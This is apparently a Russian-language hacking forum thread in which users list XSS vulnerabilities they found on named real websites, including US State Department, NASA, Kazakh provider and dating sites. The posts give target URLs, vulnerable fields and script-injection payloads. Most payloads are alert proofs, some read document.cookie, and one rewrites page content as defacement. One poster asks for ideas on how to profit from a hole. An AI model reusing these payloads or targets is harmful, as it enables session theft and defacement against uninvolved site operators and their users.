http://sprashivai.ru Заходим на страницу регистрации В поле Имя пользователя вводим Code: <script>alert('xss')</script> И воля!
megaline.kz - крупнейший казахстанский провайдер. photo.megaline.kz - в форме регестрации вписываем Code: ><script>alert('alert')</script> Любуемся =) //зы нашёл ещё вчера, но тут зарегался только седьня.
http://universant.vov.ru/php4/love/anketa.phtml?id=3522 Уязвимое поле Место работы Добавьте другое место работы, если его еще нет в списке
U.S Department of State не активка =(( но сайт знаменитость.. http://travel.state.gov/search/search_4654.html вписываем: Code: [SIZE=1]<script>document.body.innerHTML ="<style>body{ visibility:hidden; }</style><div style =visibility:visible;><img src= https://forum.antichat.ru/antichat/pic/logo.gif></img></div></script>[/SIZE]
www.peoples.ru Активная xss в названии темы на доске объявлений Code: Пример: <script>alert(1)</script> http://www.peoples.ru/in/board_messages.php
такая же фигня в ссылках, в теме и теле + Code: http://www.peoples.ru/search/?name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://market.ya1.ru/ Активная XSS в тексте объявления Code: <script>alert(1)</script> -- пассивки http://www.almaz-antey.ru/news.php?srch=%3Cscript%3Ealert(1)%3C/script%3E Code: http://www.fototraveller.ru/news/news.php ><script>alert(1)</script> http://www.nne.ru/search.php?text=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&imageField.x=12&imageField.y=12 http://www.vokrug.tv/search/?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
www.animecouncil.net активная xss в комментариях к новости в поле " Your name " Code: пример <script>alert(1)</script> http://www.animecouncil.net/news.php?id=168 -- пассивки в поиске http://www.arip.co.th/ http://fullrshare.com/
http://www.alexbriffett.com Активная xss в поле "Your name" Code: пример <script>alert(1)</script> http://www.alexbriffett.com/image?id=11&t=image -- пассивки в поиске <script>alert(1)</script> http://www.downarchive.com/ ><script>alert(1)</script> http://ads.lzjl.com/newServing/yesupSearch/image.php
http://www.utworzspotkanie.pl/ http://www.enotatka.pl/ http://www.webgallery.za.pl/ по ходу одно и то же Активная XSS в комментариях к фото Code: пример <script>alert(1)</script> http://www.utworzspotkanie.pl/photo.php?id=27 ======================================== пассивки в китайском поиске http://www.carnets.cn/ http://www.hr.gov.cn/ http://www.dangxiao.henan.gov.cn/ http://www.yugaopian.com/
http://www.dosug.cz/servlet/ru/recover Вводим: http://www.cadebou.pp.ru/ru/gb.php http://www.laspodmoga.ru/gb.php При ответе уязвимы все поля, кроме каптчи:
http://www.a1tv.ru/msearch/?&o= вводим Code: "><script>alert(/Xss by Jokerll/)</script> Выходит - http://www.a1tv.ru/msearch/?&o="><script>alert(/Xss by Jokerll/)</script>
nasa в паб. http://buzzroom.nasa.gov/ там где написано "What's Happening?" меняем на: "><ScRipT>alert(document.cookie)</ScRipT>
mylove.ru активка в поле "интересы" в анкете ( а также в остальных полях там же). Не фильтруется вообще ничего, любой хтмл код лезет Code: Активка вида <script>alert(/1/)</script> т.е. не закрываем тег (иначе будет видно в панели наверху) Также, возможно, аналогичным образом уязвимы сайты-клоны lovegeek.ru и sex-znakomstva.tv
PostgreSQL Foundry http://pgfoundry.org/account/register.php уязвимы все поля регистрации "><script>alert()</script> тИЦ 170, PR-7
ТИЦ 500 http://www.indarnb.ru/add-preview/ Уязвимы все поля "><script>alert(document.cookie)</script>
20 000 хостов, ТиЦ 275 HTML: http://www.web-ip.ru/index.php?action=reg&r=1 Втавляем HTML: "><script>alert()</script> в поле E-mail. как извлечь из этой дыры пользу не знаю Если есть идеи напишите плз
http://www.it-monster.ru/register/typecandidate/ Уязвимое поле ICQ UIN "><script>alert(/xss/)</script>